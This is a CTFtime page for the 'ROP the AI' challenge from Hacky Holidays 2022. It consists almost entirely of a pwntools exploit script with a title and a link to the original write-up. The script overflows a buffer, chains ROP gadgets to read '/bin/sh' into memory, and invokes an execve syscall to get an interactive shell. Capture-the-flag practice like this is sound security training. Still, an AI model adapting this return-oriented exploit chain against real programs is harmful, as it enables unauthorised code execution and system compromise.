CTFtime.org / Hacky Holidays - Unlock the City / ROP the AI / Writeup

Exploit script:

```py
from pwn import *

def start(argv = [], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript = gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe] + argv, *a, **kw)

gdbscript = '''
break *vuln
init-pwndbg
continue
'''.format(**locals())

exe = './ROP-the-AI'
elf = context.binary = ELF(exe, checksec = False)
rop = ROP(elf)
context.log_level = 'info'

io = start()

ret = rop.find_gadget(['ret'])[0]
pop_rdi_ret = rop.find_gadget(['pop rdi', 'ret'])[0]
pop_rax_ret = rop.find_gadget(['pop rax', 'ret'])[0]
pop_rsi_pop_r15_ret = rop.find_gadget(['pop rsi', 'pop r15', 'ret'])[0]
pop_rdx_ret = rop.find_gadget(['pop rdx', 'ret'])[0]
syscall_ret = rop.find_gadget(['syscall', 'ret'])[0]

payload = flat([
b'A' * 120,
ret,
pop_rdi_ret,
elf.bss(),
elf.symbols['gets'],
pop_rax_ret,
0x3b,
pop_rdi_ret,
elf.bss(),
pop_rsi_pop_r15_ret,
0,
b'pwnisfun',
pop_rdx_ret,
0,
syscall_ret
])

print(io.recv().decode())
io.sendline(payload)
io.sendline(b'/bin/sh\x00')

io.interactive()
```

Original writeup (https://github.com/a-r-r-o-w/capture-the-flag/tree/master/writeups/hacky-holidays-deloitte-2022/downtown/easy-rop-the-ai).

ROP the AI

Comments

Sign in with